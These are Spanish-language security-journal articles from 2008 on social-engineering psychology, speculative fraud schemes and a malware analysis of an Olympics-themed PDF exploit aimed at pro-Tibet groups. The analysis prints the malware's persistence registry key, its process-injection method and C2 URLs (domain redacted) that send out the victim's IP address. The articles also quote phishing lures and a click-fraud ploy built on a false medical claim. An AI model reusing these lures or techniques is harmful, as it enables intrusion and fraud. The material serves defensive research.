Conformidad, cumplimiento y obediencia Respondemos a las presiones de conformidad, cumplimiento y obediencia alterando nuestro comportamiento. Muchos ataques de ingeniería social pueden explicarse a partir de las respuestas predecibles de las víctimas a estas presiones. Una ingeniera social podría hacerse pasar por una ejecutiva de visita y persuadir a un joven guardia de seguridad para que la dejara entrar en las instalaciones pese a no llevar placa de identificación. (La promesa de la agresora en forma de recompensa o amenaza de castigo puede suponer otro elemento de presión para el guardia.) El guardia podría sentirse abrumado y obedecer. No se han registrado ataques de ingeniería social en grupo, pero son perfectamente viables. Varios ingenieros sociales podrían hacerse pasar por empleados legítimos e incomodar a una recepcionista hasta conseguir que les dejara entrar en la oficina espetando frases como “No nos haga perder el tiempo” o “Déjenos hacer nuestro trabajo”. La recepcionista simplemente podría dejarles pasar para no ganarse la antipatía de los demás. Otra técnica distinta que se sabe que utilizan los espías es relacionarse durante un tiempo con la víctima. El agresor solicita en un primer momento información "inocente" a la víctima y posteriormente intenta sonsacarle información confidencial. La víctima se siente atrapada; presionada para satisfacer la siguiente solicitud, dado su historial de condescendencia, o se arriesga a sufrir algún tipo de chantaje.
OTOÑO 2008
11
Conclusión Nuestra susceptibilidad a la ingeniería social tiene su origen en la estructura del cerebro humano, en la compleja interacción entre los centros de la emoción y la razón. La ingeniería social es la manipulación del miedo, la curiosidad, la codicia o la compasión de la víctima. Los sesgos y errores cognitivos en nuestros esquemas sociales permiten explicar el éxito de la ingeniería social. Entonces, ¿por qué esta información es tan importante para nosotros? En la encuesta anual sobre seguridad y crimen informático (Computer Crime and Security Survey) de 2007 realizada por el instituto para la seguridad informática (CSI), sólo un 13% de los encuestados manifestó haber comprobado cuán eficaz era la formación de sus empleados frente a los ataques de ingeniería social21. Aunque un 13% es un cifra baja, la encuesta no incluía a los encuestados que no tenían un programa de formación sobre ataques de ingeniería social. Un paso obvio es crear y mejorar las políticas de seguridad y los programas de formación de los usuarios sobre ingeniería social. Cualquier política en materia de ingeniería social resultará más convincente si utiliza estudios científicos que la avalen. Asimismo, los materiales formativos de los usuarios también
NOTAS 1 “Bank loses $1.1M to online fraud” (Un banco sufre pérdidas de 1,1 millones de dólares a causa de un fraude online), BBC (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm 2 Schneier, B., “The Psychology of Security” (La psicología de la seguridad), Essays and Op Eds (2007). http://www.schneier.com/essay-155.html 3 Ibid. 4 Asimov, I. “El cerebro humano”, Barcelona: ediciones Toray, 1967. 5 Johnson, S. “La mente de par en par: Nuestro cerebro y la neurociencia en la vida cotidiana”, Madrid: Ediciones Turner, 2006. 6 Svoboda, E. “Cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward” (Cultivar la curiosidad; cómo explorar el mundo: el desarrollo del sentido del asombro puede ser su propia recompensa), Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html 7 Leyden, J. “Hackers debut malware loaded USB ruse” (Los piratas estrenan la estratagema de las unidades USB infectadas con malware), The Register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/ 8 McAfee VIL: GPCoder.i, 9 de junio de 2008. http://vil.nai.com/vil/content/v_145334.htm 9 Cialdini, R. “Influence: The Psychology of Persuasion” (Influencia: la psicología de la persuasión), Nueva York: HarperCollins, 1998. 10 Heuer, Richard J., Jr. “The Psychology of Intelligence Analysis” (La psicología del análisis de la inteligencia), Center for the Study of Intelligence, CIA (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html 11 Tversky, A. y Kahneman, D. “Judgment under uncertainty: Heuristics and biases” (Juicio ante la incertidumbre: heurística y sesgos), Science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf 12 Mather, M., Shafir, E., y Johnson, M. K. “Misrememberance of options past: Source monitoring and choice” (Distorsión de opciones pasadas: supervisión del origen y elección), Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf
12
McAFEE SECURITY JOURNAL
serán más eficaces si incluyen los sesgos cognitivos que suelen aprovechar los ingenieros sociales, y los vídeos didácticos más provechosos si reproducen ataques que aprovechan cada uno de nuestros sesgos cognitivos. No podemos cambiar la naturaleza humana. Hemos nacido con nuestras emociones y razón divididas, y somos propensos a cometer errores mentales. Esto es normal, pero dicho comportamiento es peligroso bajo el dictado de los ingenieros sociales. Si entendemos la psicología de la ingeniería social y formamos a los usuarios para que conozcan sus efectos, podremos defendernos de estos ataques con mayor éxito.
Karthik Raman, CISSP, es científico de investigación en McAfee Avert Labs. Sus áreas de investigación incluyen el análisis de vulnerabilidades y la seguridad de redes y software. Además de la seguridad, también está interesado en las ciencias cognitiva y social, y en la programación de equipos. Para divertirse, Raman juega al cricket, toca la guitarra y estudia idiomas. Raman se licenció en Informática y Seguridad Informática en la Norwich University (Vermont) en 2006.
13 Nickerson, R. S. “Confirmation Bias: A Ubiquitous Phenomenon in Many Guises” (Sesgo de confirmación: un fenómeno ubicuo con muchas formas), Review of General Psychology, Vol. 2, No. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf 14 Zajonc, R. B. “Attitudinal Effects of Mere Exposure” (Efectos actitudinales de la mera exposición), Journal of Personality and Social Psychology, 9, 2, 1-27 (1968). 15 Kaplan, D. “Virginia Tech massacre may spawn phishing scams” (La masacre de Virginia Tech puede dar pie a fraudes de tipo phishing), SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishing-scams/ article/105989/ 16 Tversky, A. y Kahneman, D. “Judgment under uncertainty: Heuristics and biases” (Juicio ante la incertidumbre: heurística y sesgos), Science, 185, 1124-1130 (1974). Disponible en http://psiexp.ss.uci.edu/research/teaching/ Tversky_Kahneman_1974.pdf. 17 Dhamija, R., Ozment, A., Schecter, S. “The Emperor’s New Security Indicators: An evaluation of website authentication and the effect of role playing on usability studies” (Los nuevos indicadores de seguridad de Emperor: una evaluación de la autenticación de sitios Web y el efecto de los juegos de rol en los estudios de la usabilidad), (2008). http://www.usablesecurity.org/emperor/ 18 Mitnick, Kevin D., Simon, William L. “El arte de la intrusión”, México: Ra-Ma, 2007. 19 Gilbert, D. T., y Malone, P. S. “The correspondence bias” (El sesgo de correspondencia), Psychological Bulletin, 117, 21–38 (1995). http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20 (CORRESPONDENCE%20BIAS).pdf 20 Taylor, S.E. y Fiske, S.T. “Point of view and perception so causality” (Punto de vista y percepción de la causalidad), Journal of Personality and Social Psychology,, 32, 439-445 (1975). 21 Computer Security Institute, CSI Computer Crime and Security Survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (es necesario registrarse)
Ingeniería social 2.0: ¿Y ahora qué? Markus Jakobsson
Aunque posiblemente la ingeniería social ha estado entre nosotros desde los orígenes de la civilización, son muchos los que muestran su preocupación porque en la actualidad se está transformando y sembrando el caos en Internet. En este artículo, ofrecemos algunas previsiones sobre lo que cabe esperar en el futuro. Parece obvio que la ola de crimeware que vivimos está motivada por los incentivos económicos. La situación actual nada tiene que ver con la que observamos en el pasado. Los primeros virus eran sólo una expresión de curiosidad intelectual, competitividad y quizás algo de hastío. Esto es especialmente patente en el caso de los fraudes de clic y el phishing. ¿Qué otra motivación se puede encontrar que no sea la de conseguir algo de dinero? (O a veces, incluso mucho dinero.) Igual ocurre con el spam en sus distintos formatos. Si los remitentes de spam no ganaran dinero, no habría spam. Por lo tanto, si deseamos prever cuáles serán las tendencias en el futuro, tiene sentido plantearse cómo pueden obtener beneficios los delincuentes mediante el uso fraudulento de las funciones actuales de Internet.
Fraudes en Internet: un delito sociotécnico Cada vez más expertos reconocen que el fraude ya no es únicamente un problema de carácter técnico, sino que existe un componente de ingeniería social que está cada día más presente. El phishing es un buen ejemplo, pero no el único. Cada vez son más habituales los ataques de crimeware que dependen de la ingeniería social para su instalación. Un ejemplo reciente es el timo denominado "Better Business Bureau", que se ilustra en la Figura 1. En este ataque de phishing, la víctima potencial recibe un mensaje de correo electrónico que parece proceder de la empresa Better Business Bureau, en relación con una reclamación contra la empresa del destinatario. El adjunto, que supuestamente contiene los detalles de la queja, en realidad incluye un troyano de descarga. Y lo que es peor, estos mensajes se suelen enviar a las personas con más responsabilidad en la empresa, normalmente a los encargados de atender las quejas de los clientes a diario.
Los defensas configuran los ataques Desde el punto de vista de los delincuentes, cometer fraudes a través de Internet es una actividad relativamente cómoda y segura. Aparte de ser el teletrabajo perfecto para un gamberro, ofrece escalabilidad, alta rentabilidad y le permite en gran medida ocultar su rastro, por lo que el riesgo es mínimo. Así que, no es de extrañar que el fraude a través de Internet se haya disparado. Pero, para comprender los ataques, debemos comprender también las defensas. Es evidente que en la actualidad la lucha contra los delitos se articula en tres planos diferentes: las herramientas técnicas (como el software antivirus, los filtros para el correo spam y los complementos del navegador para impedir el phishing); las campañas educativas (como las organizadas por FTC, eBay, SecurityCartoon.com, bancos y el grupo Carnegie Mellon University Usable Privacy and Security Laboratory [CUPS]) y, por último, los medios legales. Estos últimos normalmente implican la localización del origen, la requisición de la caja de caudales y, por último, el procesamiento de los responsables. Las iniciativas en el campo técnico y educativo, si funcionaran, reducirían la rentabilidad para los delincuentes y, por otro lado, los esfuerzos legales aumentarían el riesgo de sus actividades. Estos riesgos son importantes, especialmente si tenemos en cuenta lo fácilmente que escala el fraude a través de Internet. Por lo tanto, no es descabellado pensar que la próxima frontera en la ciberdelincuencia incluirá un componente que dificulte el seguimiento. Tomemos como válido este supuesto e investiguemos qué podría significar en el futuro. Para ello, vamos a considerar dos tipos de ataques muy difíciles de localizar. Hasta la fecha no se ha producido ninguno de ellos, pero ambos están preparados. Pero, en primer lugar, para entender realmente la importancia del aspecto legal, nos saldremos por la tangente y analizaremos por qué el “ransomware” no se convirtió nunca en el desastre que muchos vaticinaban.
OTOÑO 2008
13
El fracaso del ransomware A finales de la década de los 90, algunos investigadores de la Universidad de Columbia afirmaron que la siguiente ola de malware podría intentar secuestrar los archivos de los equipos de las víctimas codificándolos mediante una clave pública incluida en el cuerpo del malware. A continuación, los delincuentes pedirían un rescate a cambio de la clave secreta que proporcionaría acceso a los archivos cifrados. Años después, el troyano Archiveus realizó un ataque de estas características, aunque con una pequeña diferencia: utilizó criptografía de clave simétrica, en lugar de una clave pública. El ataque se frustró cuando, mediante un proceso de ingeniería inversa del troyano, se extrajo la clave de cifrado/descifrado y se distribuyó a todas las personas que habían sido víctimas del ataque. Sin embargo, es posible que el ataque de Archiveus nunca hubiera prosperado aunque hubiese utilizado criptografía de clave pública (que, por su naturaleza, habría impedido revertir la ingeniería de la clave de cifrado del código, ya que, en primer lugar, nunca habría estado ahí). El motivo por el que Archiveus habría fracasado no es de carácter técnico; sino que es más bien de carácter financiero: los delincuentes no podrían nunca haber recogido el rescate de forma segura sin dejar ningún rastro.
El azote del vandalware Sin perder de vista el ejemplo del ransomware, consideraremos un nuevo tipo de ataque, que podemos denominar "vandalware". No se trata de vandalismo por diversión o rebeldía, sino más bien como medio de conseguir dinero. El delincuente actuaría de la siguiente forma: en primer lugar, seleccionaría una empresa como objetivo y utilizaría técnicas de extracción de datos para obtener el máximo de información sobre los empleados que son vulnerables. Entendemos por empleado vulnerable aquel que tiene acceso a datos confidenciales o bien a las páginas de la “fachada” de la página Web de la empresa. A partir de ellos, uno de estos vándalos puede conseguir información de la estructura interna de la empresa, los nombres de los empleados clave y el formato utilizado para las direcciones de correo electrónico. En segundo lugar, el delincuente adquiriría opciones de venta de la empresa. (Damos por supuesto que se trata de una empresa que cotiza en bolsa.) Una opción de venta es un instrumento financiero que aumenta su valor si el precio de la acción correspondiente cae; los inversores y especuladores utilizan las opciones de venta para obtener ganancias cuando disponen de información de que una acción determinada va a perder valor. Con toda probabilidad, otros inversores, no sólo el delincuente, comprarían también opciones de venta, especialmente si el volumen de negociación de las acciones de la empresa es considerable. En tercer lugar, el delincuente desencadenaría un ataque contra la empresa, quizás enviando a los empleados seleccionados mensajes falsos como si procedieran de otro empleado, como su jefe: “Hola Juan. Mira las diapositivas de PowerPoint que adjunto y dime qué piensas. Si es posible, envíame una evaluación rápida para mañana por la mañana. Espero que puedas hacerlo.” O, quizás, de un administrador del sistema: “Hay un nuevo virus informático y nuestros sistemas no disponen aún de los parches necesarios para neutralizarlo. Instalar inmediatamente en vuestros equipos el programa que adjunto. Es importante hacerlo cuanto antes.”
¿Y qué ocurriría si alguien abriera o ejecutara el archivo adjunto? Pongamos por caso que el mensaje no terminara en la carpeta de spam y que el sistema antivirus no lo detectara, entonces, tendríamos una infección en un equipo con acceso a información confidencial o al sitio Web de la empresa. ¿Y qué pasaría si parte de esa información confidencial acabara en Internet, incluso en el sitio Web de la propia empresa? El revuelo sería inevitable y el precio de las acciones se vería afectado. Entonces, el delincuente haría efectivas sus opciones de venta, aprovechándose de que conocía de antemano que el precio de las acciones de la empresa iba a descender. Su comportamiento no parecería sospechoso, no sería posible localizarlo, ya que todos los inversores con opciones de venta estarían en la misma situación. ¿Quién sería el delincuente? Nadie podría decirlo.
Falsificación de clics El fraude del clic es otro tipo de fraude habitual en Internet. Aprovecha el hecho de que cuando un particular hace clic en un anuncio, el anunciante paga una comisión al sitio Web que contiene el anuncio y al portal que proporciona el anuncio al sitio Web. Otros tipos de fraude relacionados aprovechan la publicidad en la que se transfiere dinero cuando el particular ve un anuncio de banner, con independencia de lo que haga, y otras modalidades en las que se genera una venta u otra acción cuando alguien ve un anuncio. El objetivo puede ser obtener beneficios económicos de estas transferencias (los delincuentes obtienen ganancias cuando sus sitios Web muestran los anuncios) o agotar el presupuesto para publicidad de sus competidores (cuando éstos son los anunciantes desde los que se transfiere el dinero). Con frecuencia, los delincuentes generan tráfico de forma automática, de forma que parezca que personas reales han visto los anuncios. La automatización puede incluir distintas formas de malware, como las redes de bots. Otro método habitual entre los delincuentes es contratar a personas para que hagan clic en determinados anuncios; esto se denomina "click farm" (literalmente, "fábrica de clics"). Reclamación contra BBB
BBB CASE #569822971 Complaint filed by: Michael Taylor Business Name: Contact: BBB Member:
Complaint filed against: Complaint status: Category: -
Case opened date: Contract Issues Case closed date: 2/28/2008 *** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.*** On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.) The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. © 2008 BBB.org, All Rights Reserved.
Figura 1: Timo del Better Business Bureau. El mensaje contiene un adjunto infectado que el agresor espera que abra el destinatario.
14
McAFEE SECURITY JOURNAL
A continuación, describiremos cómo se puede utilizar la ingeniería social en una nueva clase de fraude de clic. En primer lugar, empezaremos por explicar el caso más habitual que no constituye un fraude de clic: •
•
Caso 1 Sitio Web estándar. Pensemos en un sitio Web legítimo que proporciona determinados servicios y que muestra anuncios relativos a dichos servicios. Los portales de anuncios (por ejemplo, Google y Yahoo) normalmente determinan de forma automática el contenido de los anuncios. Para ello, examinan el contenido del sitio Web y seleccionan anuncios sobre temas relacionados con dicho contenido. Si, por ejemplo, el sitio Web se dedica a la cocina, los anuncios pueden referirse a baterías de cocina, sartenes o cafeteras. Normalmente estos sitios colocan anuncios que atraen tráfico. En este sitio cabe esperar ver anuncios que utilicen las palabras clave “cuchillo”, “horno”, “teflón” y otros similares. No hay nada inusual en este tipo de sitio. Caso 2 Uso de arbitraje. Ahora, consideremos un segundo sitio Web que tiene contenido que selecciona anuncios corres pondientes a las palabras clave “buscar abogados” (“find a attorney”). (Exactamente “buscar abogados” y no “buscar abogado.” Pronto explicaremos por qué.) El sitio puede utilizar para esto mucho texto (visible o no) que repite esta frase. Supongamos que, cuando se escribió este artículo, el coste de este tipo de estrategia era de 1,07 a 7,05 dólares por palabra clave (precio en Estados Unidos para las palabras correspondientes en inglés). El precio exacto depende del lugar, la hora del día y, naturalmente, las demás ofertas que haya para las palabras clave en cuestión, ya que todos los precios de palabras clave se establecen en subastas. De este modo, si un usuario hace clic en un anuncio de este sitio, el propietario del anuncio tendría que pagar ese importe al portal, que a su vez transferiría ese importe, descontando su comisión, al sitio Web que muestra el anuncio.
Ahora, imaginemos que el sitio en cuestión incluye un anuncio que utiliza la palabra clave “buscar abogado.” La única diferencia es una “s”. El precio de esta palabra clave va de 0,87 a 3,82 dólares. Supondremos que el sitio Web paga 2 dólares por cada visitante que consigue y recibe 4 por cada visitante que hace clic en un anuncio del sitio. Siempre que el cincuenta por ciento de los visitantes que llegan a través del anuncio de 2 dólares hagan clic en un anuncio de 4 dólares, el sitio Web consigue ganancias, sin proporcionar ningún servicio. Esto se conoce como arbitraje de palabras clave. No es exactamente igual que el fraude de clic, pero, como podremos ver, se acerca. •
Caso 3 Un ataque utilizando ingeniería social. Ahora veremos cómo podría utilizar un delincuente la ingeniería social y explotar la técnica del arbitraje con el fin de conseguir ganancias espectaculares. Supongamos que el delincuente crea un sitio Web que genera la palabra clave “mesotelioma” (un tipo de cáncer poco frecuente provocado por la exposición al amianto). En el momento de redacción de este documento, esta palabra clave de Google cuesta 63,42 dólares (precio en Estados Unidos de la palabra en inglés). El delincuente compra tráfico para la palabra clave “asma” (0,10 dólares) para atraer visitantes al sitio. Si de 634 personas que entren al sitio una hace clic en el anuncio del mesotelioma, el delincuente gana dinero. Pero, ¿por qué haría alguien algo así? Supongamos que el contenido del sitio Web es un artículo, supuestamente escrito por un médico, que pregunta: “¿Sabía que el diez por
ciento de los enfermos de asma tienen riesgo de contraer mesotelioma?” Aunque esta afirmación no es cierta, habrá muchas personas a las que les preocupa el asma y que no saben nada del mesotelioma. Estas personas harán justo lo que pretende el delincuente: hacer clic. ¿Serán la mitad de los visitantes? Si hay mil visitantes al día, esto significa que las ganancias diarias superarán los 30.000 dólares. E incluso si utilizara palabras clave menos llamativas, el delincuente conseguiría unas ganancias nada desdeñables. Lo que distingue estos tres casos es la intención y el uso que se hace de la ingeniería social. Desde la perspectiva de los proveedores de anuncios, estos tres casos son muy similares en cuanto a estructura. Un visitante entra, lee el contenido y hace clic en un anuncio. Aunque es posible comparar las palabras clave que entran y las que salen para localizar anomalías, los delincuentes también pueden utilizar un proveedor de servicios para generar respectivamente el tráfico entrante y el tráfico saliente. Esta estrategia dificulta la detección y la neutralización de estos tipos de ataques, especialmente si se llevan a cabo a pequeña escala con un número reducido de sitios.
Conclusión La ingeniería social ha llegado a Internet para quedarse. Sus efectos ya son patentes a través de timos de phishing y ahora empezamos a observar cómo los delincuentes utilizan la ingeniería social para mejorar la eficacia del spam y el crimeware. Además, mucho nos tememos que nos aguardan aplicaciones aún más sofisticadas a la vuelta de la esquina, resultado de la cada vez mayor complejidad del uso de la ingeniería social en otros tipos de fraude, como el fraude de clic. Conscientes de esto, podemos diseñar medidas técnicas y gracias al conocimiento de los posibles modos de ataque en el futuro, podremos mejorar las defensas. Pero debemos entender también que nuestra estrategia requiere mejores interfaces de usuario, mejores procedimientos, una legislación más restrictiva y mejores campañas educativas. Todavía queda mucho por hacer.
Dr. Markus Jakobsson es científico jefe en el centro de investigación Palo Alto Research Center. Se encarga de la investigación del phishing y de las medidas para combatirlo, los fraudes de clic, el factor humano en la seguridad, la criptografía, la protección de las redes y el diseño de protocolos. Es editor de Phishing and Countermeasures (El phishing y las medidas para combatirlo; Wiley, 2006) y coautor de Crimeware: Understanding New Attacks and Defenses (Crimeware: los nuevos ataques y las defensas; Symantec Press, 2008). Imagen cortesía de PARC, fotógrafo: Brian Tramontana.
OTOÑO 2008
15
Un objetivo perfecto para el malware de ingeniería social Elodie Grandjean
Los creadores de malware suelen emplear métodos de ingeniería social para infectar directamente un sistema o un host o para iniciar una cascada de descargas y ejecutar malware. La mayoría de nosotros hemos recibido algún mensaje de correo electrónico que contenía adjuntos o URL maliciosos con información sobre una importante actualización de seguridad o sobre un viejo amigo deseoso de restablecer el contacto perdido. Pero no vaya a creerse que el correo electrónico es el único vector de ataque utilizado para propagar malware con trucos de ingeniería social. Hay muchas otras trampas, incluido el uso de conocidos servicios de mensajería instantánea. El sistema infectado de un amigo puede enviarle un mensaje solicitándole que vea unas imágenes con una URL que señala a un archivo. El problema está en que confía en el contacto y no sabe que el otro sistema está afectado. En muchos casos, la URL le lleva al malware. Otras aplicaciones de malware recurren a la ingeniería social para robar información confidencial, como credenciales de inicio de sesión, números de tarjetas de crédito, etc. Estas técnicas suelen utilizarse en ataques de phishing o intrusiones en servidores. Los trucos más frecuentes de ingeniería social que emplean los creadores de malware son los de servicios para “adultos”, pero hay otros. He aquí una lista, aunque es claramente incompleta: •
Vínculos e imágenes pornográficos
•
Uso de nombres de mujer en el campo del remitente
•
Programas políticos que solicitan contribuciones en nombre de un candidato célebre
•
Mensajes falsos de correo electrónico procedentes de bancos, servicios de pago electrónico y otros servicios financieros que solicitan la confirmación o actualización de las credenciales de inicio de sesión o información sobre la tarjeta de crédito
16
McAFEE SECURITY JOURNAL
•
Mensajes de correo electrónico amenazadores sobre penas de cárcel o procedimientos de actuación como miembro de un jurado
•
Salvapantallas y juegos gratuitos que contienen un troyano, o herramientas antispyware gratuitas que con frecuencia son programas no autorizados
•
Grandes acontecimientos, como encuentros deportivos, desastres climáticos o noticias urgentes
•
Nombres de famosos y noticias sobre sus aventuras y escándalos
•
Relaciones que pueden ser de confianza o secretas, como afiliaciones a sitios Web de redes sociales, listas de amigos, compañeros de clase, familiares y amantes secretos
El catálogo de temas es prácticamente ilimitado, lo que significa que es posible acercarse a grandes grupos de usuarios de todo el mundo y que la ingeniería social puede dirigirse con frecuencia a grupos de usuarios nacionales e incluso locales. Por ejemplo, con un ataque global que tenga como marco un sitio Web de red social muy visitado, el creador de malware puede obtener respuestas de todo el mundo; por su parte, es probable que un ataque similar en las elecciones presidenciales estadounidenses sólo capte víctimas norteamericanas.
¿Por qué las Olimpiadas? Durante meses, China ha estado en el punto de mira a causa de los Juegos Olímpicos de Pekín 2008. El interés de los medios de comunicación ha sido enorme y ha abarcado a atletas, aficionados, infraestructura, medio ambiente y política, entre otros. En el terreno político, las protestas por la situación del Tíbet han sido un tema muy delicado; muchas organizaciones de todo el mundo a favor del Tíbet libre se han beneficiado del protagonismo de las Olimpiadas. También otros asuntos, como la esclavitud laboral y los derechos humanos, han cobrado más relieve. Y numerosos usuarios de Internet están lo suficientemente interesados como para leer noticias y otros artículos online. La antorcha olímpica se convirtió en un símbolo candente de los manifestantes en los meses anteriores a los Juegos. El viaje de la antorcha por todo el mundo tuvo una tremenda difusión en los medios de comunicación y acrecentó si cabe el interés y la participación de seguidores y oponentes. Este interés creciente también amplió el área de ataque potencial que podían explotar los creadores de malware.
Muestreo de víctimas Normalmente, los ataques de ingeniería social necesitan “muestrear” antes a sus víctimas para tener éxito. Veamos quiénes podían ser las víctimas potenciales de un ataque que tuviera como cebo el conflicto China-Tíbet o los Juegos Olímpicos. Ya hemos visto que, en los grupos a favor del Tíbet, algunas personas recibían mensajes de correo electrónico sobre la situación tibetana, China en general o las Olimpiadas, con datos adjuntos CHM (archivos de ayuda compilados), PDF, PPT, XLS o DOC. Todos estos mensajes parecían proceder de una organización o persona de confianza. Probablemente estos usuarios estaban acostumbrados a recibir este tipo de documentos de sus simpatizantes y habían bajado la guardia. Estos datos adjuntos en concreto eran malintencionados: utilizaban varias vulnerabilidades de la Ayuda de HTML compilado de Microsoft, Adobe Acrobat, Microsoft Excel, Microsoft PowerPoint o Microsoft Word para introducir y ejecutar sigilosamente archivos ejecutables incrustados. En ese momento el área de ataque elegida era relativamente pequeña, pero la difusión mediática de las protestas en el Tíbet contribuyó a avivar la llama.
El uso de los Juegos Olímpicos como eje de ingeniería social permitió a los creadores de malware dirigirse a muchos entusiastas del deporte, además de a todas las personas previamente identificadas por su interés en el conflicto entre el Tíbet y China.
Llegado este punto, la base de víctimas, que hasta entonces incluía a las organizaciones elegidas al principio y a sus simpatizantes, pasó a englobar a cualquiera que sintiera curiosidad sobre la situación en el Tíbet. Una vez más, la atención de los medios favoreció este incremento entre la población vulnerable. A continuación, los creadores de malware se aprovecharon de los propios Juegos Olímpicos para propagar ataques de ingeniería social con la aparición del rootkit pro-Tíbet2. Este conjunto de archivos malintencionados funcionaba oculto bajo un archivo de película de animación que ridiculizaba el esfuerzo de un gimnasta chino; durante su reproducción, varios archivos maliciosos se introducían inadvertidamente en el sistema de la víctima e instalaban un rootkit para esconderse. El uso de los Juegos Olímpicos como eje de ingeniería social permitió a los creadores de malware dirigirse a muchos entusiastas del deporte, además de a todas las personas previamente identificadas por su interés en el conflicto entre el Tíbet y China.
Más adelante se piratearon algunos sitios Web legítimos dedicados a apoyar al Tíbet para incrustar el troyano Fribet1, que se descarga por sí solo en los equipos de los visitantes aprovechando vulnerabilidades de los navegadores Web.
OTOÑO 2008
17
Caso real: ataque de malware en torno a los Juegos Olímpicos Hace poco recibimos el archivo PDF declaration_olympic_games_ eng.pdf, enviado inicialmente a un grupo pro Tíbet (Véase la Figura 1). Este documento parecía inofensivo porque al abrir la aplicación aparecía el texto y no había daños ni problemas inmediatos. Por lo tanto, en general nadie sospechaba de actividades malintencionadas. Sin embargo, en segundo plano se creaban subrepticiamente archivos maliciosos en el equipo de la víctima. Veamos exactamente cómo funcionaba el ataque. En realidad, declaration_olympic_games_eng.pdf es un archivo PDF vacío que aprovecha una vulnerabilidad de Acrobat para introducir y ejecutar la primera parte del paquete malicioso. Este archivo ejecutable malintencionado (detectado como BackDoorDOW3) se incrusta en formato cifrado en la ubicación que muestra el editor hexadecimal de la Figura 2 (página siguiente). La Figura 3 (página siguiente) muestra los primeros bytes del archivo incrustado una vez descifrado.
Sponsor’s declaration of responsibility at the 2008 Beijing Olympic Games WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the “harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity,” as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the People’s Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about China’s human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY
Name/Title Date
18
McAFEE SECURITY JOURNAL
Este ejecutable introduce el archivo PDF legítimo, book.pdf, que se muestra al ejecutar el primer archivo. El archivo dropper busca el proceso AcroRd32.exe en la lista de procesos activos, encuentra el directorio donde está instalado Acrobat y abre book.pdf. La Figura 4 muestra en la página siguiente el código del archivo responsable de esta acción. El malware también introduce otro archivo ejecutable, book.exe, que se copia en %PERFILTODOSUSUARIOS%\Application Data\ msmsgs.exe y crea un nuevo servicio de Windows4. Este nuevo servicio se muestra con el nombre “Servicio Administrador de discos lógicos” y se encarga de que, al iniciarse, Windows ejecute el troyano automáticamente. El malware tiene incluso un “plan B” para interceptar el proceso de inicio: si no consigue crear el servicio, añade una nueva entrada de registro, Windows Media Player, que señala a msmsgs.exe. Windows Media Player se añade a la siguiente clave de inicio del registro de Windows5: HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run. El troyano también crea dos archivos que contienen datos cifrados: •
C:\WINDOWS\jwiev.log.bak
•
C:\WINDOWS\clocks.avi.bak
Figura 1: Hace poco los partidarios del Tíbet recibieron este archivo aparentemente legítimo adjunto a un mensaje de correo electrónico.
Finalmente, book.exe desaparece creando un archivo por lotes que se autoelimina y autofinaliza. A partir de ese momento, msmsgs.exe toma el relevo.
El código malicioso inyectado en svchost.exe llama a la función workFunc() de avp01.lic, que se conecta a un servidor remoto y envía tres solicitudes:
Msmsgs.exe introduce temporalmente otro archivo en la siguiente ubicación: C:\Archivos de programa\WindowsUpdate\ Windows Installer.exe. Justo antes de borrarse, Windows Installer.exe introduce dos copias de un archivo DLL en:
•
http://www1.palms[eliminado]/ld/v2/loginv2.asp?hi=2wsdf351&x =0720080510150323662070000000&y=192.168.1.122&t1=ne
•
http://www1.palms[eliminado]/ld/v2/votev2.asp?a=7351ws2&s =0720080510150323662070000000&t1=ne
•
http://www1.palms[eliminado]/ld/v2/logoutv2.asp?p=s9wlf1&s =0720080510150323662070000000&t1=ne
•
C:\Documents and Settings\All Users\DRM\drmv021.lic
•
C:\Documents and Settings\All Users\DRM\avp01.lic
El malware se inyecta en svchost.exe para ocultar su actividad. Lanza una nueva instancia de svchost.exe (proceso legítimo del sistema6), asigna un bloque de memoria en el espacio de direcciones de este nuevo proceso, guarda una copia de sí mismo en el espacio de direcciones virtual de svchost.exe (en la dirección 0x400000) y ejecuta el código malicioso creando un subproceso remoto.
Los parámetros x e y pueden diferir. El valor de x se forma al concatenar “07” con la fecha (10/05/2008) y la hora (15:03:23) exactas en que se creó el archivo clocks.avi.bak y, para finalizar, con el código no modificable “662070000000”. El valor de y es la dirección IP del equipo de la víctima.
